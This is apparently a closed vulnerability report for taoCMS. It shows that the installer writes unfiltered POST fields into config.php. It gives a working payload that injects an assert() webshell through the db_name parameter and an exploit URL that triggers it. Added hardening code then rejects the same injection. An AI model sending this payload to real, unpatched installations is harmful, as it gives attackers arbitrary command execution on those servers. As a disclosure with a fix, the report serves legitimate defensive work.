Closed jadacheng closed 3 years ago
In the CMS installation process, the configuration file filtering is not rigorous; you can insert malicious code during the installation process to execute arbitrary commands, and even get a Webshell. Source: ./install.php:234-238

```php
$configs=file_get_contents('config.php');
$_POST['tb']&&$configs=str_replace('define(\'TB\', \''.TB.'\');','define(\'TB\', \''.$_POST['tb'].'\');',$configs);
$_POST['db']&&$configs=str_replace('define(\'DB\', \''.DB.'\');','define(\'DB\', \''.$_POST['db'].'\');',$configs);
$_POST['db_name']&&$configs=str_replace('define(\'DB_NAME\', \''.DB_NAME.'\');','define(\'DB_NAME\', \''.$_POST['db_name'].'\');',$configs);
file_put_contents('config.php',$configs);
```
payload:
/taocms-master/install.php [POST]db=Mysql&db_name=%7C127.0.0.1%3A3306%7Croot%7Croot%7Cwity%7C');assert($_REQUEST['cmd']);//&tb=test&Submit=%E7%82%B9%E5%87%BB%E6%AD%A4%E5%A4%84%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85%E5%85%8D%E8%B4%B9%E5%BC%80%E6%BA%90%E7%9A%84taoCMS%E7%B3%BB%E7%BB%9F
exploit: http://127.0.0.1/taocms-master/config.php?cmd=phpinfo();
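The root cause in the snippet above is that raw `$_POST` values are spliced into PHP source with `str_replace`, so a single quote in the value ends the string literal and everything after it becomes code. The following is an added example of a hardened version of that config-writing step; it is not taocms code, not the reporter's code, and not the fix shipped in 3.0.1. Function names (`safe_config_value`, `rewrite_define`, `write_config_values`), the whitelist pattern and the sample config string are assumptions made for illustration.

```php
<?php
// Added example (not taocms code): hardened replacement for the
// install.php step that writes POST values into define() lines.

/**
 * Validate a user-supplied config value and return it as a safe PHP
 * string literal. Anything that could close the quoted string
 * (quote, backslash, parenthesis, semicolon, slash) is rejected.
 */
function safe_config_value(string $value, int $maxLen = 255): string
{
    // Whitelist (assumed for this example): letters, digits and the
    // punctuation a DSN-like value such as |host:3306|user|pass|db| needs.
    if (strlen($value) > $maxLen || !preg_match('/^[A-Za-z0-9_.:|@\-]+$/', $value)) {
        throw new InvalidArgumentException('Invalid configuration value');
    }
    // var_export() emits a correctly quoted and escaped PHP string
    // literal, so the value can only ever be a string, never code.
    return var_export($value, true);
}

/**
 * Replace the define('CONSTANT', '...') line in $configs, matching the
 * existing line by constant name instead of by its current value.
 */
function rewrite_define(string $configs, string $constant, string $value): string
{
    $literal = safe_config_value($value);
    $pattern = '/define\(\s*\'' . preg_quote($constant, '/') . '\'\s*,\s*\'[^\']*\'\s*\);/';
    // A callback avoids backreference interpretation of the replacement text.
    $result = preg_replace_callback(
        $pattern,
        function () use ($constant, $literal) {
            return "define('" . $constant . "', " . $literal . ");";
        },
        $configs,
        1,
        $count
    );
    if ($result === null || $count !== 1) {
        throw new RuntimeException("Could not locate define() for $constant");
    }
    return $result;
}

/**
 * Apply only the expected POST fields to the config file and write it
 * atomically (temp file + rename) so a failed write cannot truncate it.
 */
function write_config_values(string $path, array $post): void
{
    $allowed = ['tb' => 'TB', 'db' => 'DB', 'db_name' => 'DB_NAME'];
    $configs = file_get_contents($path);
    if ($configs === false) {
        throw new RuntimeException('Cannot read config');
    }
    foreach ($allowed as $field => $constant) {
        if (isset($post[$field]) && $post[$field] !== '') {
            $configs = rewrite_define($configs, $constant, (string) $post[$field]);
        }
    }
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, $configs, LOCK_EX) === false || !rename($tmp, $path)) {
        throw new RuntimeException('Cannot write config');
    }
}

// Demo on a constructed config string (not the real taocms config.php).
$sample = "<?php\ndefine('TB', 'tao_');\ndefine('DB', 'Sqlite');\ndefine('DB_NAME', 'data.db');\n";
echo rewrite_define($sample, 'DB', 'Mysql');
echo rewrite_define($sample, 'DB_NAME', '|127.0.0.1:3306|root|root|wity|');
try {
    // A value carrying a quote and PHP code, as in the report, is rejected
    // before anything is written.
    rewrite_define($sample, 'DB_NAME', "x');assert(\$_REQUEST['cmd']);//");
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ' . $e->getMessage() . "\n";
}
```

The two layers are deliberate: the whitelist stops the injection shown in the report, and `var_export()` keeps the written value a string literal even if the whitelist is later relaxed to admit quotes in passwords. Matching the `define()` line by constant name rather than by the live constant's value also avoids the silent no-op that `str_replace` produces when the current value has already changed.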
3.0.1 fixed, thanks for your contribution